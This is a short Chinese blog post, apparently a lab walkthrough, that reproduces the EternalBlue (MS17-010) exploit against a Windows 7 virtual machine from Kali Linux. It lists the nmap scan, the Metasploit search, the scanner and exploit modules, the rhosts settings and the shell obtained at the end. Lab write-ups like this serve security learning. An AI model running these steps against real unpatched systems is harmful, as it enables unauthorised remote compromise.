永恒之蓝漏洞复现

漏洞复现

1、准备攻击机和靶机

攻击机:kali linux 192.168.1.20

靶机: windows7虚拟机

2、登录kali linux ,用nmap探测网段内存活主机

1588e4922895447bade21f1a417a7701.png

 可以看到靶机445端口是开启的

3、使用MSF的永恒之蓝攻击模块

打开MSF:msfconsole

b87784b76fec4b0c9e9cd57084f9ca9a.png然后搜索ms17-010 代码:search ms17-010a7e10c0107b3413aa519e17b9e1a8317.png

 在这里我们能够看到一些工具,其中

 auxiliary/scanner/smb/smb_ms17_010是扫描模板,对靶机进行扫描

exploit/windows/smb/ms17_010_eternalblue是攻击模板

使用模板    use 3

设置目标IP或网段

set rhosts 192.168.1.16

执行扫描:runbb4c11f9a06f42458fb94787778cbecd.png

出现以上的【+】部分,说明漏洞存在

4、使用ms17-010的攻击模板,攻击靶机

使用模块 use 0

设置攻击目标的IP set rhosts 192.168.1.16

d0adf59386c14f9ab32e144957cf9fcd.png

 进行攻击 exploit或run

3b515282323d4b60a81a4ed4b1081e32.png

 攻击完成

5、得到靶机shell

a55c3c69a9f34fcda4fc910b16419ece.png

查看网络配置

c0038dd452994917bbbffef64e1aeb42.png

 chcp 65001解决乱码问题

5bbab064502c476487f591a97b5c2fac.png

 

 

 

 

 

 

 

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值